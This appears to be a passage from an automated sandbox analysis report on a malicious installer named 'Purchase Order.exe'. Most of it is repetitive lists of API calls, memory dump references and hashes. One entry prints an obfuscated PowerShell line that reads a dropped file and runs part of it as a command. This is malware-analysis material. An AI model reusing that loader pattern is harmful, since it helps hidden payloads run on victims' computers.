                                                          • Instruction Fuzzy Hash: 8AE04F31B001746FDB217AF14E8EE7F11989B84348B64417EF601B62C3DDBC4D434AA9
                                                          Function 00401717 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: PathSearch
                                                          • String ID:
                                                          • API String ID: 2203818243-0
                                                          • Opcode ID: 342f1d8797400d1def45ae1f8570d4d2e76e844b62760f1e711b9a1a45a0c132
                                                          • Instruction ID: c7ce876e5ad96af4d980a0e505f4bdb0f2e6b31a9f033159e1f135e3aabe3218
                                                          • Opcode Fuzzy Hash: 342f1d8797400d1def45ae1f8570d4d2e76e844b62760f1e711b9a1a45a0c132
                                                          • Instruction Fuzzy Hash: 3DE0D872204100ABE300DB549D48FAA3758DB10368F304537F201A60C1D2B499459639
                                                          Function 00402B44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          • Opcode ID: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                          • Instruction ID: d438f0a484ed9c160f568b140fbb6a6f0821f4cba08bd088e2e240e06c4f75a3
                                                          • Opcode Fuzzy Hash: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                          • Instruction Fuzzy Hash: 5FE04676240208AFDB00EFA9ED4AFA637ECBB18705F008425B609E60A1C678E5508B69
                                                          Function 00405A49 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040307A,00000000,00414420,000000FF,00414420,000000FF,000000FF,00000004,00000000), ref: 00405A5D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                          • Instruction ID: 4baa6dbb94b5aed14ede1987b2b874979685841cdf923a54f3be7db8892ddb6c
                                                          • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                          • Instruction Fuzzy Hash: 65E0EC3265425EAFDF109E659C40EEB7BACEB053A0F008933F925E2150D231E821DFA9
                                                          Function 00405A1A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030C4,00000000,00000000,00402EEE,000000FF,00000004,00000000,00000000,00000000), ref: 00405A2E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                          • Instruction ID: b949637607fe9c5fc006a161b6664aa16a088e5f06d71f7b71a40b2ab1c7b417
                                                          • Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                          • Instruction Fuzzy Hash: 80E0EC3261425AABDF109E959C40FEB7B6CEF45360F048532F915E6590E231E8219FA9
                                                          Function 00403F60 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageA.USER32(00010446,00000000,00000000,00000000), ref: 00403F72
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
                                                          • Instruction ID: 75b6af85c7b4550c46e72781509667ec0f8baecc0ee27a44b040c7e6c7b1aa08
                                                          • Opcode Fuzzy Hash: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
                                                          • Instruction Fuzzy Hash: 1FC04875B88201BAEE218B609D4AF167BA8AB60B42F258429B211E60E0C674F410DA2D
                                                          Function 00403F49 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                          • Instruction ID: 9ba269cb94747afcd00db45940492297b6475019a1e9eeef8f710f25602b24aa
                                                          • Opcode Fuzzy Hash: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                          • Instruction Fuzzy Hash: 71B01235684200BBFE325B00DE0DF457E62F768701F008034B300250F1C7B200A2DB29
                                                          Function 004030C7 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 004030D5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                          • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                          • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                          • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                          Function 00403F36 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(?,00403D13), ref: 00403F40
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: 30d96cd9fc0d8ad999d68dc10700da8fc20303459ddb892013b18747b66c33f5
                                                          • Instruction ID: 0d109c2b2df33cddb2fdb4737f0edb640fcb727031da007fe45ed195bb05a301
                                                          • Opcode Fuzzy Hash: 30d96cd9fc0d8ad999d68dc10700da8fc20303459ddb892013b18747b66c33f5
                                                          • Instruction Fuzzy Hash: 57A012314041009BCB015B10DF04C097F61A750300B054430E1044403482310820FF09
                                                          Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNELBASE(00000000), ref: 004014E5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: dc3d2d615763224e0b4d086791dfb261f8c28fceebc5a70e28d87f5d5b295402
                                                          • Instruction ID: 60e4a6f428f33354aa107cd4fbd7dd9a9c37d23ed13856081ad7c9c956fab211
                                                          • Opcode Fuzzy Hash: dc3d2d615763224e0b4d086791dfb261f8c28fceebc5a70e28d87f5d5b295402
                                                          • Instruction Fuzzy Hash: FBD0C777B1454047D710F7B97E8545A6399F7513253204933D502F1091D578C9069A29

                                                          Non-executed Functions

                                                          Function 004048C5 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 004048DD
                                                          • GetDlgItem.USER32(?,00000408), ref: 004048E8
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404932
                                                          • LoadBitmapA.USER32(0000006E), ref: 00404945
                                                          • SetWindowLongA.USER32(?,000000FC,00404EBC), ref: 0040495E
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404972
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404984
                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 0040499A
                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004049A6
                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004049B8
                                                          • DeleteObject.GDI32(00000000), ref: 004049BB
                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049E6
                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049F2
                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A87
                                                          • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404AB2
                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AC6
                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404AF5
                                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B03
                                                          • ShowWindow.USER32(?,00000005), ref: 00404B14
                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C11
                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C76
                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C8B
                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404CAF
                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CCF
                                                          • ImageList_Destroy.COMCTL32(00000000), ref: 00404CE4
                                                          • GlobalFree.KERNEL32(00000000), ref: 00404CF4
                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D6D
                                                          • SendMessageA.USER32(?,00001102,?,?), ref: 00404E16
                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E25
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404E45
                                                          • ShowWindow.USER32(?,00000000), ref: 00404E93
                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404E9E
                                                          • ShowWindow.USER32(00000000), ref: 00404EA5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          • Opcode ID: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
                                                          • Instruction ID: ee94c2e81ac7fcd3d2633371b1ae487f30220c2a0e0de663c2dd45f1c85c3c3c
                                                          • Opcode Fuzzy Hash: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
                                                          • Instruction Fuzzy Hash: D70262B0A00209AFEB20DF55DC45AAE7BB5FB84315F14413AF610BA2E1C7799D51CF58
                                                          Function 00404352 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 274stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 004043A1
                                                          • SetWindowTextA.USER32(00000000,?), ref: 004043CB
                                                          • SHBrowseForFolderA.SHELL32(?,00428C40,?), ref: 0040447C
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404487
                                                          • lstrcmpiA.KERNEL32(Execute: ,Misguidingly Setup: Installing), ref: 004044B9
                                                          • lstrcatA.KERNEL32(?,Execute: ), ref: 004044C5
                                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044D7
                                                            • Part of subcall function 00405509: GetDlgItemTextA.USER32(?,?,00000400,0040450E), ref: 0040551C
                                                            • Part of subcall function 00405F9A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Purchase Order.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                            • Part of subcall function 00405F9A: CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                            • Part of subcall function 00405F9A: CharNextA.USER32(?,"C:\Users\user\Desktop\Purchase Order.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                            • Part of subcall function 00405F9A: CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                          • GetDiskFreeSpaceA.KERNEL32(00428838,?,?,0000040F,?,00428838,00428838,?,00000001,00428838,?,?,000003FB,?), ref: 00404595
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B0
                                                            • Part of subcall function 00404709: lstrlenA.KERNEL32(Misguidingly Setup: Installing,Misguidingly Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                            • Part of subcall function 00404709: wsprintfA.USER32 ref: 004047AF
                                                            • Part of subcall function 00404709: SetDlgItemTextA.USER32(?,Misguidingly Setup: Installing), ref: 004047C2
                                                          Strings
                                                          • C:\Users\user\AppData\Local\potentially, xrefs: 004044A2
                                                          • Execute: , xrefs: 004044B3, 004044B8, 004044C3
                                                          • A, xrefs: 00404475
                                                          • Misguidingly Setup: Installing, xrefs: 0040444F, 004044B2
                                                          • "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)", xrefs: 0040436B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"$A$C:\Users\user\AppData\Local\potentially$Execute: $Misguidingly Setup: Installing
                                                          • API String ID: 2624150263-1258093842
                                                          • Opcode ID: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
                                                          • Instruction ID: ab5132907fc5b2f665edfad9f17b3ca32a66d27d09768481e079f0ca797b6646
                                                          • Opcode Fuzzy Hash: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
                                                          • Instruction Fuzzy Hash: 07A194B1900209ABDB11AFA2CC45AAF77B8EF85314F10843BF601B62D1D77C8941CB69
                                                          Function 0040205E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                          Download Yara Rule
                                                          APIs
